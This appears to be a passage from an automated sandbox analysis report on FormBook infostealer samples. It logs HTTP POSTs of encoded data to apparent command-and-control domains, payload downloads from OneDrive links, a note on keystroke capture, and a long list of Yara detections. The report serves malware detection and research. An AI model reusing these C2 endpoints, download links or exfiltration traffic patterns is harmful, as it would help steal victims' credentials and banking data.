r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 08 Aug 2022 18:14:24 GMTContent-Type: text/htmlContent-Length: 291ETag: "62f13bce-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Aug 2022 18:14:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 18:15:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: TR0627729920002.exe, Jwjxmakrv.exe.0.dr String found in binary or memory: http://www.emerge.deDVarFileInfo$
Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.nomaxdic.com
Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.nomaxdic.com/uj3c/
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/9
Source: Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/dK
Source: Jwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6Ib
Source: Jwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa
Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzP
Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xB
Source: Jwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB
Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/2A
Source: Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/k
Source: unknown HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: Host: onedrive.live.comCookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
Source: global traffic HTTP traffic detected: GET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: lValiHost: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: Host: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.comCookie: wla42=
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: 6Host: onedrive.live.comCookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: Jwjxmakrv.exe, 00000008.00000002.323528611.00000000007FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
